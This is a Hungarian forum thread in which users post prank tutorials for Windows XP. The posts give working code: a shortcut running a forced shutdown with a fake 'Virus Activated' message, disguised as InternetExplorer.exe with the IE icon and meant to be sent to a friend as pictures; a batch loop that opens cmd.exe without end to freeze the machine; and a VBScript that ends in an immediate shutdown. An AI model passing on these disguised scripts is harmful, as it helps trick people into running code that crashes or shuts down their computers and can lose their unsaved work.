Vicc / vicces képek topik :)

Van nekik... strapabíró laptop is. Jó drága, de már hallattam olyat, hogy megmentette valakinek az életét (megfogta a golyót). :)

Bizony. Origón volt asszem egy videóbeszámoló róla: leöntötték vízzel, leejtették több méterről, nekimentek kalapáccsal, semmi baja nem volt. Igaz viszont, hogy ha be akarsz tenni egy CD-t, le kell csavarozni a gép oldalát :D

Yo:

<object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/zFnZCrq6W8c&rel=1"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/zFnZCrq6W8c&rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object>
(és most már lehet beágyazni youtube meg egyéb videókat, mert lejácca)

ha valakit érdekel hogy szivassuk meg egy "kedves" havert akkor postolom
(elindítja az exe-t és kap egy feliratot hogy 30mp és leáll a gép meg hogy vírus activated....... EZT átt lehet írni másra.... JHA és nem tart tovább 2 perc -nél az elkészítése :D

szal úgy gondoltam hogy feltöltöd valahova és mondod neki hogy húde fasza képek vagy bármi és töltse le :)

szükséges időbefektetés: max. 1-2 perc...

Tutorial:

1. lépés: Hozz létre egy parancsikont. (Jobb klikk -> Új -> Parancsikon)

2. lépés: A bejövő ablakon lesz egy olyan, hogy: "Adja meg az elem helyét: " -> Oda írd be a következőt: shutdown -s -t 50 -c "ERROR 324: Virus Activated" -> Majd klikk a Next gombra.

3. lépés: Most meg kell adni a file nevét... itt több lehetőséged is lehet, most én InternetExplorer-nek fogom álcázni ezt a "vírust" smile.gif azaz: beírom, hogy: InternetExplorer.exe

4. lépés: Most létrehozta a parancsikont, már csak egy icon-t kell neki találni. Jelen esetben az IE ikonját állítom be, amivel alapból rendelkezik az XP. Azaz: Jobb klikk a file-ra -> Tulajdonságok -> Ikoncsere... -> Ott pedig kiválasztod az IE ikonját...

HATÁS: Ha az "áldozat" ráklikkel a cuccra (jelen esetben az IE-re), akkor bejön egy ablak, majd visszaszámol és leállítja a rendszert smile.gif Persze ez semmit nem árt nekei, csak annyit, hogy be fog sz*rni, mert azt hiszi majd, hogy NA A K*RVA ÉLETBE ÚJRA KELL RAKNI A RENDSZERT... de hamar rájön majd, hogy ez nem így van

(forrás www.*******.hu oldal )

javítottam..... holnapra ujjabb trükk ami kicsit durvább de még mindig nem olyan veszélyes :D

szal 1 kis előzetes..... :D olyan lessz hogy ''végtelenszer'' megnyitja a cmd (parancs-sort ) amitől kifagy a windows..... esetleg ha kilövöd a feladatkezelőben megúszod :wink: . A másik kidob 1 üzit a képernyőre és ott lessz hogy ok ezt 3 megnyomod és restart.

A cmd-s a vista alatt szerintem nem megy, mert ha valamiből sok nyíilik meg, akkor egy szám után rékérdez, hogy te akartad-e ezt, illetve ha megnyitod a feladatkezelőt, akkor is leáll a dolog.

nha amit ígértem....

utorial:

1) Szükséged lesz egy notepadra (jegyzettömbre)

2) Csinálj egy .bat kiterjesztésű fájlt jegyzettömbbel, névnek mindegy mit írsz be.

3) Ha ez megvan, akkor klikk jobb gombbal a fájlra --> szerkesztés

4) Oda pedig írde be a következőket:

KÓD
@echo of
:A
start cmd.exe
goto A

5) Ennek az lesz a hatása, hogy a "végtelenszer" megnyitja a cmd-t (parancssort)... De csak elméletileg végtelenszer, gyakorlatilag annál kevesebbszer a géptől függ, hogy mennyit bír... lassú gépeknél nem könnyű leállítani, mert teljesen kifagyasztja a rendszert (most csak Windowsos környezetről beszélek), nem jön be a feladatkezelő... stb

Hátránya: nem lehet álcázni

Tipp: Nem kötelező cmd.exe-t írni, helyette lehet p.l. notepad.exe... stb.

1. Nyisd meg a Notepadot.
2. Majd szépen illezd ezeket bele

KÓD
msgbox "Hali, ezt beszivtad :D"
msgbox "3"
msgbox "2"
MsgBox "1"
MsgBox "Bye"
Dim wshshell
set wshshell = wscript.CreateObject("WScript.Shell")
wshshell.run "shutdown -s -t 0"

természetesen az MsgBox után bármit írhatsz és akár hányat, beilleszthesz ... majd végén a kis script ujrainditja a gépet , majd mentsd el meglepi.vbs -nek vagy aminek akarod de a .vbs maradjon
Tehát ha elinditja bejön egy ablak amiben írha h Hali, ezt beszivtad majd OK ra megy mert hát sok választása nem lessz ujab albak amin a 3 majd OK, 2 majd OK, 1 majd OK és vegül restart

(forrás: mit az előzőnél :wink: )

ha valakit akit nem ''szerecc'' annyira és elküldöd neki akkor vices (legalábbis a küldő fél részére ) csak meg kell nézi a másik fél reakcióját :D

hispan1":161871vs mondta:
Ez inkább érdekes...

Mi alatt van kipróbálva? 98, XP, Vista?

xp-n müxik (tesztelve :wink: ) szerintem nagy esélye van hogy 98-n is müxik

Vissza
Top Alul